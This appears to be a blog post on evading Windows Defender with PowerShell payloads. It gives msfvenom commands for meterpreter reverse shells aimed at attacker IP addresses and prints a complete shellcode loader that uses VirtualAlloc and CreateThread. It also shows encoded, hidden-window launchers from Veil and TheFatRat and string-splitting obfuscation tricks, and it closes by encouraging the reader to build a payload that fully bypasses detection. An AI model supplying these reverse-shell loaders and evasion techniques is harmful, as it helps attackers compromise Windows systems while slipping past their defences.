Avoiding Windows Defender detection – PowerShell payload

How to avoid detection is a question every attacker asks. These days it is not easy to create a payload that avoids detection without triggering an alarm. All antivirus vendors, Microsoft Defender included, put a lot of effort into protecting users against threats, and every day they do their job better. They constantly update their detection systems and fill their databases with virus signatures; as soon as a new virus shows up in the wild, it is just a matter of time until a patch is available. On the other side, attackers are not sitting with their hands crossed either. Every day they look for new ways to avoid detection, writing new code and recompiling existing code with the goal of evading detection and compromising the system. Remember, no protection will protect you 100%. This is a never-ending cat and mouse game between antivirus vendors and attackers, a game that will never end and in which the attackers are always one step ahead.

In this post I will rely on the PowerShell scripting language, which is still the best, most popular and most common language for creating payloads and compromising the Windows operating system. PowerShell is a task-based command-line shell and scripting language built on .NET, which helps system administrators and power users rapidly automate tasks that manage operating systems and processes. But I should mention, and we need to take into account, that it is just a matter of time until the game between PowerShell payloads and Windows Defender ends, since Microsoft is really putting a big effort into defending the system. Why, you will see further in the text.

In the following text I will show you how payloads were created in the past and how they are created today, and I will also describe how detection has evolved in the meantime.

In the past it was enough to use a one-line command, e.g. in msfvenom, to generate a payload. But those times are far behind us.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > /root/Desktop/reverse_tcp.exe

or, for a raw PowerShell payload:

msfvenom --payload windows/meterpreter/reverse_http LHOST=192.168.1.104 LPORT=8080 --format psh --smallest --platform win --arch x86

which gives you the following output:

$KrJpyZMB = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@

$bvznJqWjba = Add-Type -memberDefinition $KrJpyZMB -Name "Win32" -namespace Win32Functions -passthru

[Byte[]] $zqiGAfUTkxCBu = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x0,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x7,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x3,0x53,0x53,0x68,0x90,0x1f,0x0,0x0,0xe8,0x9c,0x0,0x0,0x0,0x2f,0x31,0x73,0x41,0x4c,0x31,0x42,0x6d,0x36,0x30,0x36,0x59,0x31,0x46,0x6a,0x51,0x58,0x61,0x52,0x49,0x43,0x56,0x41,0x77,0x4e,0x62,0x77,0x6c,0x79,0x73,0x0,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x0,0x2,0x60,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0xa,0x5f,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x16,0x68,0x88,0x13,0x0,0x0,0x68,0x44,0xf0,0x35,0xe0,0xff,0xd5,0x4f,0x75,0xe1,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x68,0x0,0x0,0x40,0x0,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x0,0x20,0x0,0x0,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcd,0x8b,0x7,0x1,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x7d,0xff,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x31,0x2e,0x31,0x30,0x34,0x0

$VifvHnUwWmKQjn = $bvznJqWjba::VirtualAlloc(0,[Math]::Max($zqiGAfUTkxCBu.Length,0x1000),0x3000,0x40)

[System.Runtime.InteropServices.Marshal]::Copy($zqiGAfUTkxCBu,0,$VifvHnUwWmKQjn,$zqiGAfUTkxCBu.Length)

$bvznJqWjba::CreateThread(0,0,$VifvHnUwWmKQjn,0,0,0)

But very soon basic payload generation was patched, so attackers were forced to find a new way. Soon they figured out that encoding the payload would avoid detection. Because the payload was encoded, Windows Defender and other antivirus products did not know what was hiding behind the encoded string, so the system was easily compromised.

Here are a few examples of encoded payloads created with different payload generators.

Payload created with msfvenom:

Note that in this case a base64 encoder was used which is not installed in Metasploit by default.

msfvenom --payload windows/meterpreter/reverse_http LHOST=192.168.1.104 LPORT=8080 --format psh --smallest | msfvenom --payload - --platform win --arch x86 --encoder base64 NOEXIT SYSWOW64

c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoExit -EncodedCommand <base64-encoded script omitted>

Payload created with TheFatRat:

powershell -w 1 -C "sv di -;sv qG ec;sv Foj ((gv di).value.toString()+(gv qG).value.toString());powershell (gv Foj).value.toString() '<base64-encoded payload omitted>'"

Payload created with the Veil:

@echo off
if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"<base64 blob omitted>\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"<base64 blob omitted>\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")

You can see three encoded payloads, and all of them are slightly different. But the point of all of them is the same: when they get executed, PowerShell decodes the string and injects the payload into memory.

This trick worked for a while, until vendors patched the payloads generated with the most popular payload generators. But attackers and developers kept updating the payloads with obfuscation and changing signatures. As soon as you change the payload's signature to one that is not already in the antivirus database, it cannot be detected. Here is how this can be done.

For example, you can replace PowerShell switches with their shortened forms:

-NoExit = -NoE
-EncodedCommand = -Enc
-Command = -C

and so on…

For example, you can obfuscate commands:

Invoke-Expression = "In"+"vok"+"e"+"-E"+"xpre"+"ssion"

Obfuscation can be done in many ways, and I will not dig deep into it here because it is a really large field; I will leave this topic for another post. But here is a link where you can find a really cool script obfuscator which does all the heavy lifting for you: https://github.com/danielbohannon/Invoke-Obfuscation

We covered how PowerShell payloads developed over time and how encoding and obfuscation tricks were used to avoid detection. But unfortunately, today it does not work so easily. The reason is that Microsoft made a really big step forward in security and, with the April 2018 update (build 1803), changed the rules of the game. Windows Defender got a big update. I mean, now it is not enough just to avoid detection when the payload file is downloaded onto the victim's computer, because when the payload is executed, Windows Defender decodes the payload and scans the code again. If the code includes any suspicious command, e.g. VirtualAlloc, CreateThread, etc., it sends the code to the cloud for additional analysis and stops execution until it is sure the code is not harmful. Sometimes it takes a day before you receive the notification that the executed file is malicious. So the next step is to obfuscate the PowerShell payload before it is encoded, or even to recompile the whole code. For security reasons I will not post the raw obfuscated PowerShell script, to avoid it being patched or used for malicious purposes. But I think I have given you tips and orientation on where and how to continue the work of creating a powerful payload which fully bypasses detection. But you also need to take into account that Windows Defender ATP is integrated with AMSI, which is very effective against obfuscation. Remember, there is always a way.
